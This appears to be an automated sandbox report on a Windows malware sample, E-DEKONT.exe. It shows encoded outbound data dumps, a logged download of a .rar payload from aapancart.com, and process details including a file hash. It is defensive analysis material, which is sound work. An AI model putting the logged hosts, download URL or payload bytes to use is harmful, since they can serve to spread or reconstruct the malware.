                                                                          Nov 29, 2022 09:20:53.680210114 CET4941OUTData Raw: ae 03 55 ae 03 55 9a ff b2 0e 01 51 ae 03 57 aa 03 55 8c 03 55 ae 45 3c c2 66 26 f2 32 09 e0 55 02 f4 42 05 ff 50 04 e2 5f 1b f8 54 0f ef 53 04 fd 52 19 80 67 3a cd 7b 1b f8 54 0f ef 53 04 fd 52 19 ea 4f 16 f4 45 19 fa 4e 1a f9 50 1e e2 45 02 e1
                                                                          Data Ascii: UUQWUUE<f&2UBP_TSRg:{TSROENPENZWSWKPHPJIHPNS@BOKRJIMTYOMHJSWERDQQIMDFRJONNGHSQJDMBL
                                                                          Nov 29, 2022 09:20:53.680262089 CET4951OUTData Raw: 1a ec 56 03 eb 44 04 eb 42 0f e1 4e 0c f8 47 12 f8 4b 0d fb 54 16 ec 55 07 ec 4f 13 e2 54 1c fa 51 00 e8 4e 0d e4 49 19 ff 57 0f fa 54 19 e1 50 13 fb 4e 04 ea 48 07 f4 47 0d f8 51 19 ec 5a 17 e5 4f 0d e9 4f 01 e9 42 11 fc 4c 05 eb 40 0c fa 51 0c
                                                                          Data Ascii: VDBNGKTUOTQNIWTPNHGQZOOBL@QRYIDEOAESTDROUSYJKRIFIBTQBARBAMDKBBJWSELSVDZMZEEFGDAVU
                                                                          Nov 29, 2022 09:20:53.680452108 CET4962OUTData Raw: ec 42 02 ed 41 10 fb 53 10 ed 56 1f fc 46 1a e4 52 1c e6 51 06 f9 40 0f f4 45 1f e3 45 19 e4 48 1c ed 47 02 e6 5b 03 e2 4a 0d e0 5b 05 fc 52 12 e4 5a 1f fb 4c 12 e0 46 11 e6 52 05 e9 45 07 e2 4c 1d e8 42 11 ff 51 17 fa 50 0d e0 44 13 ef 59 1b e1
                                                                          Data Ascii: BASVFRQ@EEHG[J[RZLFRELBQPDYY@SMJDYBPFNQIR[VMFBVZ[HTYLQVGWKHFHHLHJPFL[BY[@PBJPW[OQ
                                                                          Nov 29, 2022 09:20:53.688936949 CET4964OUTData Raw: 97 39 67 9e 39 60 9c 0e 5f f4 6c 3b cb 39 75 fb 57 16 85 33 6f 9e 0e 5f a3 09 16 fe 56 75 e3 6c 31 cb 6f 6f 8e 4a 3b da 66 39 86 51 7c 8e 40 3a dc 66 7d fa 4e 7c 8e 6a 6c 83 3a 6c 9e 33 1e 8e 40 05 fb 23 15 8e 30 7b 98 33 12 e6 79 58 a4 40 05 fb
                                                                          Data Ascii: 9g9`_l;9uW3o_Vul1ooJ;f9Q|@:f}N|jl:l3@#0{3yX@#v;9u5XD0Q9u2l_j1lum3_m!o}*uKD's=`&5f_m!o}*uKD's=`&5f_m!o}*uKD's=`&5f_X_P,w0#l6p&_P,w0_d<w'
                                                                          Nov 29, 2022 09:20:53.688985109 CET4965OUTData Raw: 2d cb 0e 5f a7 0a 26 d8 60 3d c1 70 21 80 66 2d cb 0e 5f a7 0a 26 d8 60 3d c1 70 21 80 66 2d cb 0e 5f a7 0a 26 d8 60 3d c1 70 21 80 66 2d cb 0e 5f a7 0a 26 d8 60 3d c1 70 21 80 66 2d cb 0e 5f a7 0a 26 d8 60 3d c1 70 21 80 66 2d cb 0e 5f a7 0a 26
                                                                          Data Ascii: -_&`=p!f-_&`=p!f-_&`=p!f-_&`=p!f-_&`=p!f-_&`=p!f-_fs{D-mq#`0f-_N%m2f-_\ss,`6o0b!q{{0\L3j6@9`>lm{{0\p#k:w{{0\p#k:w{{0\p#k:w{{0\i=\&q
                                                                          Nov 29, 2022 09:20:53.689133883 CET4967OUTData Raw: 42 33 e0 54 37 d6 65 01 e4 73 34 c0 67 20 d6 71 2c cb 52 2d c6 60 25 cc 2d 30 d6 66 58 a4 64 0f c2 71 24 ef 65 1b f9 61 2d c8 57 1f de 62 3b ca 76 2d dc 7a 30 ff 7b 3d cd 73 37 80 66 2d cb 0e 5f c9 59 39 dc 72 14 c8 4d 02 cc 7b 33 fa 49 25 cf 6d
                                                                          Data Ascii: B3T7es4g q,R-`%-0fXdq$ea-Wb;v-z0{=s7f-_Y9rM{3I%m1{'fk6a{{02o'B3T7es4g q,R-`%-0fXFxFMf-#~X_P:wXD:d9#q:f}7{-a3c5d_j6l&e!F1f}7{-l1{2|`'p:wug2#g4
                                                                          Nov 29, 2022 09:20:54.057970047 CET4970INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Nov 2022 08:20:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.6.37
                                                                          Vary: User-Agent
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=llFjsl3AEyfNkbRugNABAOGqOR5rIA19vhAyFtQKe5L8YzccyCxkjw%2Fllv0BjfYRxCeNUAEIhSlhyNf%2BmKdW8RdSs7h%2FqWyOEHkHMS60fJuPfRDz46JHon2ggYFG"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 7719ed3b78a05b44-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a
                                                                          Data Ascii: 7falseOK
                                                                          Nov 29, 2022 09:20:54.058010101 CET4970INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.11.2049851103.14.99.114443C:\Users\user\Desktop\E-DEKONT.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2022-11-29 08:20:38 UTC0OUTGET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                          Host: aapancart.com
                                                                          Cache-Control: no-cache
                                                                          2022-11-29 08:20:38 UTC0INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Nov 2022 08:20:35 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Thu, 24 Nov 2022 21:47:56 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 114752
                                                                          Connection: close
                                                                          Content-Type: application/x-rar-compressed
                                                                          2022-11-29 08:20:38 UTC0INData Raw: a5 fe d0 d5 2d 93 6a 5e ac 49 64 f7 7f f4 e7 b1 4e dc d1 82 66 fd fe 1a 6d 5b 9a 73 58 b6 63 40 d8 e6 00 3b 86 ae f4 56 b9 8a 13 e6 58 5b 3c 0d e8 cb f6 b6 c0 09 84 91 f6 e0 cf 34 19 00 90 e4 7f 1f 53 67 e2 e5 76 0a 3c a0 6e d8 64 14 18 1a e1 20 69 44 e9 a9 68 f2 12 6a 18 48 21 f0 0f d8 45 99 ec 41 2b 5a 52 04 96 4c 0f 11 0f 70 1b 33 00 cb ae bd 71 56 33 be ea 5b 48 e4 7a d0 4e 35 27 d1 92 b0 5c d8 d2 37 66 ff 47 ae 2d 39 9f d3 3e 30 72 a7 eb 35 d9 5e 0f 6e f8 c7 18 10 1f a3 17 9b 92 c0 fb 18 8e cb 35 ca 9e 35 57 db e1 52 80 17 60 d9 bb a7 cc 9f 50 a7 8c bc 19 4c be 22 bc 5d ab 11 f5 19 ef cd 2c f6 90 8c ed 44 1e ee 6a d9 5f 32 f1 30 4e 3b 4b c0 73 35 be 46 ff 46 e5 67 3c b2 ee 6c a6 20 1a b8 bb 9e d6 8d 40 24 dd a3 39 07 79 b4 0c 47 ea 5a 28 ff b0 d6 a1
                                                                          Data Ascii: -j^IdNfm[sXc@;VX[<4Sgv<nd iDhjH!EA+ZRLp3qV3[HzN5'\7fG-9>0r5^n55WR`PL"],Dj_20N;Ks5FFg<l @$9yGZ(
                                                                          2022-11-29 08:20:38 UTC8INData Raw: 67 60 80 73 5d bc 46 ff c6 0d 22 da 4d 11 e9 66 55 57 8b 7b cb be b8 6b 64 dd c7 c6 37 1d 3d 2c 80 af ae 2c ff b0 d6 2c ad a3 82 b5 69 be ba 44 e5 f8 34 30 e1 ea 2a 70 54 f6 cb 42 29 fb 81 92 07 4b ee 63 21 60 5a 2b 2d 41 9a 9b dc 31 1b 84 40 64 9a a9 a5 f0 96 bf 9e 1a fc c2 cf 53 3e de d8 93 43 04 d5 24 30 29 09 df 3e 06 66 b0 ac b5 b7 51 4b 94 27 31 7d 6a 4b 90 6c 11 78 83 48 6e 5d 45 3a c2 9b 01 2a f2 13 59 a9 41 31 37 c6 4c ea c6 54 03 ef a2 29 51 16 d2 3a 8a 3a 66 b5 d1 30 79 99 3b c7 2b e4 b4 7f ba fa a9 28 14 dd 87 13 54 fe 38 42 05 39 ba 25 00 61 86 30 df 0c c4 3c 1f 02 ef a6 a3 88 b2 38 46 03 8e 6c f5 11 e5 56 e5 6a 06 87 f1 16 e3 af 03 3e 14 b6 e8 1d 5f 88 aa 2a 83 9c 27 19 82 38 f6 a4 f0 dd 00 89 35 57 da 99 ca ed d4 d2 77 d3 5e 68 77 8f f4 eb
                                                                          Data Ascii: g`s]F"MfUW{kd7=,,,iD40*pTB)Kc!`Z+-A1@dS>C$0)>fQK'1}jKlxHn]E:*YA17LT)Q::f0y;+(T8B9%a0<8FlVj>_*'85Ww^hw
                                                                          2022-11-29 08:20:38 UTC15INData Raw: 58 f3 b6 a2 df e1 7f c5 bd 2a e5 37 e4 85 e1 f2 07 fe 7b ce 01 75 9a 33 c3 03 a7 7b 81 48 fd 94 7c 15 52 a4 95 32 40 ab b3 30 a5 80 cb 2e a0 46 79 eb 84 f5 5a 3d 11 e5 cb ee b1 bf 8f 32 56 77 e1 67 99 d7 7c 4c 4a 04 d1 58 0b 8d 51 02 60 6a cd e6 89 90 98 f2 9d 9b 6b 23 1a 02 81 54 e4 d1 aa 50 6f 03 d4 06 a1 a9 69 93 dc e4 1f 78 af 4d 84 37 bc 00 22 b9 f0 e2 3f 20 db a0 6f f3 02 9a b1 2f a5 e9 f1 7e f0 db d4 94 8f 71 92 35 d0 13 c5 e1 92 15 38 8d 53 f2 f4 d1 f9 a5 97 fa 1b 95 99 30 a4 d6 f3 bb 5f 50 75 36 1d 52 b7 72 4b 4a d7 4e 54 db aa 13 9f 2b 4f 62 13 97 2c 1d 81 e9 3a 92 af cb c4 cb b4 3a 20 e2 88 46 25 5e 46 4c 40 12 14 e1 8e c1 03 13 65 27 03 65 03 86 02 9d c9 08 24 78 87 e0 07 c3 e8 27 cc 93 7d b7 fb 51 6a 04 05 80 19 f9 b3 79 29 c7 87 a4 21 e3 6d
                                                                          Data Ascii: X*7{u3{H|R2@0.FyZ=2Vwg|LJXQ`jk#TPoixM7"? o/~q58S0_Pu6RrKJNT+Ob,:: F%^FL@e'e$x'}Qjy)!m
                                                                          2022-11-29 08:20:38 UTC23INData Raw: 07 9a b3 0b eb 8a 7a 96 94 cd 73 fb 3a a6 bd a7 c4 f5 5b 7e 38 b5 51 aa d3 ed 7a b0 3f 9a 64 dc 49 98 3e 7c 34 4c 16 54 ed 91 24 ad c4 83 c7 a5 ac 89 ea 55 bd 2c a5 62 d6 09 72 8e 20 a4 08 0b c4 55 e1 84 e1 3d 99 07 2e 1c 88 de ba 6d a2 7a 0c 22 07 e8 5a aa f2 b8 92 4f 15 53 95 8d 0e 4d ba db 30 82 88 e8 da 2c 11 36 e0 31 d3 17 13 cb 98 eb c4 15 2b a9 73 12 bb bc 7b df bf 00 ef ec b5 19 fd 47 cc 2a 35 d2 64 03 f9 d6 a6 df e2 01 05 13 c8 98 12 6a ea c8 f1 0f f0 53 9d d2 69 9a 57 3f d9 41 66 8d ef 17 0c a8 92 6e f0 48 69 bb f2 a9 3b c2 a2 d8 a7 ec f1 1e c5 68 6d 12 79 35 8c d4 da fa 47 47 95 02 b0 93 4a b3 30 d3 d1 4d 3c bc 22 64 98 9d 7a 55 38 7d ea a9 6b f0 71 6e db 95 04 5a 56 32 b5 b9 b9 7a 29 85 25 86 ac 60 e3 45 63 ed a8 4f cd 71 e6 b3 35 67 44 a2 ee
                                                                          Data Ascii: zs:[~8Qz?dI>|4LT$U,br U=.mz"ZOSM0,61+s{G*5djSiW?AfnHi;hmy5GGJ0M<"dzU8}kqnZV2z)%`EcOq5gD
                                                                          2022-11-29 08:20:38 UTC31INData Raw: 56 e0 09 a2 54 65 bc e6 da 0d eb b7 90 e4 79 cd 5e ee e7 5c c3 cf 0e cf c3 6d 67 79 77 34 be 46 17 08 51 98 c3 4d 5b f0 5b df e5 35 3e 3e 2b 72 bf 9e de a3 39 07 91 f0 b9 b8 15 d1 ad 5f 4d 29 5e 00 0e 66 c7 d3 16 4b 06 53 d3 34 d3 99 3e ba 26 8c 12 47 a7 80 e1 ec 6d 07 a8 ab f9 77 bc 64 5d c2 d6 f5 11 b0 87 d1 c1 37 34 8d 8d cd 9a f1 81 88 a3 40 5e 46 f8 d1 50 c7 52 0c ba 5e c7 8d 14 09 46 5d 44 2a 29 d0 07 29 d3 f5 17 41 19 65 25 da 31 27 33 64 40 a0 3e a6 fc 91 c5 7b 03 da ef 51 bd db d2 80 6a 62 4a f7 fa 5c fa 97 a3 1d 8a 02 9e b7 49 f2 ce 07 4f f9 14 cf 5a ab b6 b9 06 80 45 39 9b d1 29 fb 55 e0 0c e1 63 0a 6b a4 2a ae d8 ee 45 d8 f9 50 c4 16 f7 8f 16 59 5c 07 62 b3 85 c5 d2 42 f5 11 be 95 6e a8 55 0c 29 b3 20 47 a5 3c 14 b6 63 82 b7 07 53 db 7c c7 e4
                                                                          Data Ascii: VTey^\mgyw4FQM[[5>>+r9_M)^fKS4>&Gmwd]74@^FPR^F]D*))Ae%1'3d@>{QjbJ\IOZE9)Uck*EPY\bBnU) G<cS|
                                                                          2022-11-29 08:20:38 UTC39INData Raw: 12 d5 f7 c7 1b 59 6b f8 a5 6a 0c 4e 2a 51 07 c4 ae 1a 49 d6 f4 b1 26 22 16 ed 33 21 bd a4 25 32 5a 93 5e 2b 8a 1f 30 e9 82 cb 38 65 e1 fc 3a ef c6 8a 00 9f f2 b2 95 7d 97 da 2e 92 f9 3b e2 04 45 1e 13 27 de 78 3e 2e e4 44 64 d1 44 5a 17 93 82 17 47 c5 0a fb a7 89 c2 7d 82 33 45 6c 7f ee 71 22 b5 c7 71 1c 81 68 1e aa 4c aa 28 92 79 e3 db c0 d0 0d e6 22 f5 90 99 17 42 16 3a c3 b2 3a 16 1b e5 e0 56 75 d1 34 3b 1f 9c ce 10 90 46 82 f7 6c 8d 57 c4 63 e0 70 20 15 97 46 a6 e6 17 8f 61 c3 2c f8 a6 91 22 bc b8 ce 95 de 97 76 73 ad e5 29 cb c6 24 59 98 23 59 eb 8a b3 ec 57 0a fb 24 7b 63 53 17 4b 9a a1 5f d7 4e da 1d 21 46 46 f1 3e ba b4 68 1f dd 58 74 9b 7d f6 50 6e ec 06 03 23 ec 1d ba 44 ac 8b 68 bb f5 74 39 4e 3a 27 bc b1 7d 80 09 b6 ed d2 c8 9c 3d 91 98 4a c3
                                                                          Data Ascii: YkjN*QI&"3!%2Z^+08e:}.;E'x>.DdDZG}3Elq"qhL(y"B::Vu4;FlWcp Fa,"vs)$Y#YW${cSK_N!FF>hXt}Pn#Dht9N:'}=J
                                                                          2022-11-29 08:20:38 UTC47INData Raw: 5d 4e 7c d4 b6 64 d8 16 00 00 d8 a5 0b 33 e5 d5 89 e4 a7 de 62 c5 d2 f1 7e 93 52 84 f4 9f 01 10 9e a0 db 99 84 7d 90 16 4c 16 f4 33 7e bc 5d e1 8c 69 ea 7c a0 2f c8 45 ce f6 67 8d 74 a5 ee 2a 8c 23 91 1d 89 e5 90 91 1a 71 35 9c e7 3f a5 65 0b 8f ab 75 f8 35 d5 06 86 cf 42 c3 c6 8b 2e 5d 38 84 cd 0f b0 fa 6d 2e 02 49 b9 71 43 5c 27 fd af 46 09 6f 60 51 8d c2 06 66 62 28 12 bb eb cd 6f 49 05 e8 45 dc 19 a8 28 ae 78 c4 15 ab 86 66 4b 45 43 f0 4a e2 b2 fc 98 6d a0 9a e2 1a d4 9e 27 16 6e dc ed a6 df 39 c9 6c 69 9f 0d ad e1 57 a4 c9 59 60 27 ba 12 69 81 dc a5 ad 54 1b c9 b3 e6 f0 8f 90 66 f0 23 3a d2 8e a9 b8 3b 56 ac b7 1b 2a 5c cb 8d 6a 3e 6d 35 16 98 33 85 28 b8 b9 69 65 a0 f8 bc 95 02 42 3c 1d b9 54 ce e3 89 5d 5d c7 82 e7 95 8f 53 e4 d0 24 95 76 20 a1 48
                                                                          Data Ascii: ]N|d3b~R}L3~]i|/Egt*#q5?eu5B.]8m.IqC\'Fo`Qfb(oIE(xfKECJm'n9liWY`'iTf#:;V*\j>m53(ieB<T]]S$v H
                                                                          2022-11-29 08:20:38 UTC55INData Raw: e2 4e e4 15 34 f0 ae e2 2a 05 0d 62 a9 de 6e 22 53 17 57 b8 40 cf 43 e6 c1 3b b6 42 a2 54 ab e1 f0 af cd 1f 3f 1a 84 ac ac f8 af 95 26 2a 3d 7c 75 86 81 b7 28 33 35 56 a5 b1 b9 1a 8c 31 3f ab a4 1c 2c f3 f8 bb 76 02 c3 bf db b7 a5 b2 42 89 e4 ad cf 5f 1b 28 74 b0 29 71 6b 93 da b3 fc cb af ea 0d 8a 64 a7 66 ab 6b fb 9a 43 67 b3 49 54 26 6d 73 78 d1 e9 fb fd 36 29 ed a4 e3 70 74 cd df 3e 43 b9 37 e1 cb 5a 89 94 e6 12 07 3d 44 ed 15 00 59 62 b3 45 3d c2 46 16 09 3c 75 27 93 5b 6a 93 32 1b a9 16 41 7a 16 94 f5 6f 18 81 c1 cd cd ad ec fc 91 1e 8f 87 87 bc 07 c9 24 d2 e5 c9 5c ef 51 cb 0c 9a c7 cb f8 86 ce 60 c5 33 e1 66 28 58 ba 47 30 a5 54 eb 0d 4a 80 45 92 46 22 cf 04 27 8e 6c 41 c7 7e 05 ac 25 46 38 bf ba 27 06 b9 4c c2 08 70 7e 6d b5 43 62 3e 00 6f 2c 93
                                                                          Data Ascii: N4*bn"SW@C;BT?&*=|u(35V1?,vB_(t)qkdfkCgIT&msx6)pt>C7Z=DYbE=F<u'[j2Azo$\Q`3f(XG0TJEF"'lA~%F8'Lp~mCb>o,
                                                                          2022-11-29 08:20:38 UTC62INData Raw: eb df 03 8e 84 0a ee d4 95 e3 3f ed f1 d6 62 98 1a a5 3e 14 5e e5 a5 48 f8 d8 50 c4 3a 1b 76 51 75 bb 9f 0d e1 74 f1 8c 85 ae 91 a1 46 5f c5 9c 59 db d8 0e a2 7f 69 39 c3 4b 5f 5e 48 35 b7 cd 0a 31 c3 c9 7c 4e 88 2f 96 4c 90 f9 58 84 7c 1c 47 3a 03 19 e0 53 6c 5c 61 00 4d 44 3f 84 78 77 11 e4 44 85 84 2d 44 79 86 1a 67 00 64 4d 04 ea 8d 9d cf f0 89 16 b9 e4 d3 04 1e 6c 0f 38 7a 39 77 e1 9f 27 76 1b 5b 29 5c 08 7f 2f 6e 78 55 f7 90 ed cf 0f 39 01 d4 74 5d 77 b8 29 df 87 a9 2c ad 4d f0 a4 d9 3d 4c bb f0 4d 3f 30 db a0 41 29 02 9a 7a f2 b2 d7 e6 17 5a 7e c3 60 e3 cb 91 b7 31 70 af 86 36 b0 2f 8b f2 0d 0b 54 d1 15 e0 8e 34 54 91 ed a5 c1 f7 04 2d 3a 0e c3 6f e8 f3 a5 5e a0 28 59 68 67 de b9 e8 46 80 75 13 97 92 48 4f 4d 9c 09 ce 99 f0 c2 01 f1 a5 fb 30 45 32
                                                                          Data Ascii: ?b>^HP:vQutF_Yi9K_^H51|N/LX|G:Sl\aMD?xwD-DygdMl8z9w'v[)\/nxU9t]w),M=LM?0A)zZ~`1p6/T4T-:o^(YhgFuHOM0E2
                                                                          2022-11-29 08:20:38 UTC70INData Raw: 6b 77 32 45 46 25 03 4e 40 2e a5 37 82 9c 0c 07 6a 4a 98 66 07 1c f6 41 52 8c 65 5d 95 b6 01 b4 cf 02 00 ac 92 bb c4 1a 2a ec ec 69 d6 62 b7 dc 98 7d 84 d0 48 3b 60 8a 85 ae 2a 32 99 c2 48 1c aa a4 6f fa cc 81 ff 5c 06 2b 69 ea 1a 35 48 b1 ce 8c 53 3a a6 7c 11 44 5e ed 55 bd f2 01 75 f5 d0 f2 fb bf 53 7c dc 85 17 8b 1b 94 cb 07 56 98 d9 17 61 d9 b5 5b 76 a2 8f 86 7b b7 e6 96 f0 92 39 6e c4 1b 4d 43 11 6c 27 14 71 c5 ea ad 65 27 b6 61 8a 95 c0 09 cd 7e 32 8e dc 80 6a 43 70 c4 b2 4d 43 81 4d 50 d7 e3 73 1a 52 d4 60 20 cd 76 c3 32 88 dc 5e 4b 38 c4 9e e8 ff 62 38 97 1c c8 81 9a fc 56 97 c1 92 3f 6a e7 06 b1 0f bc ba a9 88 c8 0b b2 c5 2c 69 b3 82 44 c7 98 04 79 ff 34 51 c8 b9 db 76 7a 02 0f 01 1b 85 2e 3b f1 f5 8d ba ff 43 e1 9e 1e fd 44 46 e2 e0 f0 30 5b 95
                                                                          Data Ascii: kw2EF%N@.7jJfARe]*ib}H;`*2Ho\+i5HS:|D^UuS|Va[v{9nMCl'qe'a~2jCpMCMPsR` v2^K8b8V?j,iDy4Qvz.;CDF0[
                                                                          2022-11-29 08:20:38 UTC78INData Raw: b7 91 42 b7 e3 0d e3 5d 8e b9 26 74 94 f4 5c 56 c6 82 e7 95 9b 53 4d 59 25 95 76 e0 e1 57 45 ad cc 56 4c 40 f1 91 fe 17 48 52 db 68 05 cf 81 f0 58 4c da dd 8c 39 22 31 c6 d9 66 88 dc 7b 05 f4 10 bb e1 65 2f 25 b7 42 ef cf b1 b0 de b8 8e ca 41 cb ba ba 0d 0d cb 4c 11 e1 23 54 e7 47 44 15 83 95 a8 dc 2f 5d c6 8c ec c0 f1 b8 15 d7 65 2f 08 fa ed a9 57 3a fd 18 b9 15 a3 60 e2 c9 a7 66 4a 3f 88 37 64 c5 ec 3e 6a f2 1d 05 87 d1 b4 35 e1 86 9a 71 68 a6 58 38 05 6f 3e 37 71 aa b5 6c 0e 96 83 f2 9c f7 46 de be d1 b8 f2 ce 1f ad c9 43 ea 16 b6 e9 38 16 72 6f 2e 57 88 37 cb 43 a5 d1 24 da e2 53 e5 0b da c3 8c 39 99 46 82 7d 26 53 90 51 da 63 37 a0 14 db 5e 40 23 36 54 8e 78 34 fe 46 be 76 2c ff 95 cc 73 25 2f ef 30 a5 f3 b6 2b 42 81 45 13 c0 ce 8f 04 0b 9f 51 fe 38
                                                                          Data Ascii: B]&t\VSMY%vWEVL@HRhXL9"1f{e/%BAL#TGD/]e/W:`fJ?7d>j5qhX8o>7qlFC8ro.W7C$S9F}&SQc7^@#6Tx4Fv,s%/0+BEQ8
                                                                          2022-11-29 08:20:38 UTC86INData Raw: aa 86 61 37 c3 7e 71 43 ed ae d8 ea ad f2 21 f2 3b b1 72 17 ed a6 a3 b9 60 b3 85 eb 3a e6 24 ef 41 18 eb 0a ae f3 d6 75 d7 90 5b c1 99 33 c7 25 48 f8 bb 85 ad 39 1b 04 84 50 d5 d0 0f a4 89 49 b1 85 46 65 9e d7 db b7 e6 62 a5 97 0c e7 82 e4 ac 77 5e f4 70 5e 30 66 b7 4d 41 b9 82 69 70 a0 81 e4 44 b9 b8 5c 84 08 a1 a1 03 c4 d1 92 29 27 2a 32 02 08 bf 67 de 90 9f 47 cc 45 10 09 25 01 2a 84 1a 22 bb 3a 4d 04 02 7b 66 4a f0 fb 18 e0 b7 d1 04 09 b7 55 53 25 49 0d fe dc e6 89 f3 bf 11 b1 8c 0d 55 01 06 0a f5 d5 10 42 9a 9d 14 a3 5c 4b 16 69 53 cc f7 d3 77 ea b0 0f f4 54 50 38 96 f1 4d 39 e0 d3 b3 63 e0 15 30 26 81 d1 a7 9c 10 f9 db d4 2c aa e4 90 22 bc 78 c6 e5 34 b0 6a 37 ad 0d 0b bc 6b 0c 64 8e 46 5a 18 89 a7 c1 e0 c7 70 51 61 fd 79 3e 80 64 a1 49 2a 4e 20 e2
                                                                          Data Ascii: a7~qC!;r`:$Au[3%H9PIFebw^p^0fMAipD\)'*2gGE%*":M{fJUS%IUB\KiSwTP8M9c0&,"x4j7kdFZpQay>dI*N
                                                                          2022-11-29 08:20:38 UTC94INData Raw: a0 28 be 5b 20 23 46 63 40 2d 2c 24 29 1f dd d4 34 53 f4 26 db 2f 00 56 b2 61 6f cd b5 49 8b ad b3 bf 52 c0 c1 a2 7f fc f8 9a fd 4e 3e 5e 45 11 f5 f2 2c 0f 78 d4 b9 08 38 61 ff ff d0 15 6b 0c 5b 2a 04 6e fb d5 9c 3a 59 27 bf c3 e7 b3 0b 60 85 01 a9 56 24 66 b0 80 b5 be a5 1f 0b cc f3 b9 e1 af de 69 45 43 e7 73 70 7d de 7d 99 9a a7 2e 04 49 c9 27 7d 22 a9 23 55 59 f3 9f 40 09 18 3f a4 82 8c a0 49 2e cf 24 58 08 be bb 43 c3 44 9a 73 ab c7 7b 12 c8 31 be 93 39 7a 3e 46 05 8d 2d 07 44 e6 47 7b ba 53 b3 d2 f5 cc 33 1b 00 06 49 85 33 e4 dc 42 5f b6 a8 92 6e c4 9f fc 8c eb d4 91 50 6d ff b0 2b 20 27 f5 cb 26 e0 83 ff 8f 7e 5e 9e 27 f1 fb 95 9f 1d de 96 bb b9 ff 97 e7 e6 a2 43 48 a4 30 00 5d 1f 98 ec 41 d4 2f a6 6c 3e c9 4e 11 f0 05 e3 5b b4 4e ef bd 19 9e b6 ff
                                                                          Data Ascii: ([ #Fc@-,$)4S&/VaoIRN>^E,x8ak[*n:Y'`V$fiECsp}}.I'}"#UY@?I.$XCDs{19z>F-DG{S3I3B_nPm+ '&~^'CH0]A/l>N[N
                                                                          2022-11-29 08:20:38 UTC101INData Raw: f1 18 25 47 90 9e 23 3c e4 7a d1 44 35 9d c1 d1 be 2c 6c b2 fa 29 47 35 e2 e0 18 f0 bc 95 a7 1a d4 cb 45 8f 31 68 1c 93 aa 38 7d 39 d0 08 bb 89 a5 ab 6a 9e a5 15 bf e0 51 32 a9 95 05 8c 79 3f eb d3 ad 8f a8 22 a7 ed bc 74 4c be 22 bc 5d 8b 11 f5 19 ab cd 14 f6 a7 8c da 44 58 ee 5d d9 67 32 c2 30 0a 3b 7e c0 59 35 92 46 92 46 84 67 4c b2 c4 6c a6 20 1a b8 f9 9e d6 8d 65 24 bc a3 49 07 09 b4 68 47 8b 5a 5c ff d1 d6 84 e8 0b d2 6c 2c 23 ea 42 e5 f7 34 3f 99 b3 6a 11 df de 37 32 c1 a5 67 08 f8 0b 2e 52 78 4d 3e cd 3d 59 a6 ec 9c 45 90 a5 bc 55 72 29 40 6e 69 20 77 5c f8 c8 cf b8 d1 eb 79 ff f3 20 d5 23 15 84 f6 b9 b5 3a 9e bb 2f 36 88 50 40 33 41 bd 65 b0 0a e0 e7 91 25 27 48 3d 12 03 6e 6a 25 ac 90 a9 51 36 db 5e 33 2b 8c 7a de c4 38 8c 78 34 8a 02 42 9e 3a
                                                                          Data Ascii: %G#<zD5,l)G5E1h8}9jQ2y?"tL"]DX]g20;~Y5FFgLl e$IhGZ\l,#B4?j72g.RxM>=YEUr)@ni w\y #:/6P@3Ae%'H=nj%Q6^3+z8x4B:
                                                                          2022-11-29 08:20:38 UTC109INData Raw: 42 9b 75 03 0d 6e 5d 94 cf 67 74 f0 f8 13 93 0a b9 3f 47 19 c2 dc f3 66 3c 44 33 17 87 c0 b9 73 c1 c5 97 ef d3 37 e1 8e 35 b8 05 76 b6 90 60 d7 3a f2 8a 3c d2 16 55 0a 28 ba af 67 90 5b 36 3a a7 70 7d f0 04 4e 8c 3c e4 d3 3d 3a ef 12 fd 97 b3 79 c2 b3 15 28 24 b4 72 f6 be 29 aa c5 12 82 01 a3 e9 8b 53 03 66 dc d8 d3 4b 1d 9d a7 9e 80 d5 69 cb d2 78 07 bf 22 49 7f 1b c9 fc 04 a7 13 f7 49 bb 74 0b fb 2e b3 d5 4a fe 5a 81 0f 54 18 a3 95 ca 0e 8f d4 b0 03 e5 d1 4e 12 ad 8a 0c 0d 32 b6 53 1c 82 f4 40 df 0b 18 19 9a d6 74 ba 2a e2 48 b0 b9 1f a5 4e d6 63 d6 75 50 ba e0 df bf cf 7d 55 c3 78 83 a6 a1 10 2a 8e c5 d8 74 1c 26 11 b4 6d 39 32 69 69 0b ed 83 32 9b 8a 83 19 7b a3 52 c2 65 21 7f 2e d2 19 e8 02 44 1b a8 34 40 5e 5d 01 71 0a 8a fb f6 e0 e4 9d 5d 3a 34 08
                                                                          Data Ascii: Bun]gt?Gf<D3s75v`:<U(g[6:p}N<=:y($r)SfKix"IIt.JZTN2S@t*HNcuP}Ux*t&m92ii2{Re!.D4@^]q]:4


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:1
                                                                          Start time:09:19:48
                                                                          Start date:29/11/2022
                                                                          Path:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Imagebase:0x400000
                                                                          File size:325782 bytes
                                                                          MD5 hash:0AA36EB080CF7171CEC271B2CD4D2108
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
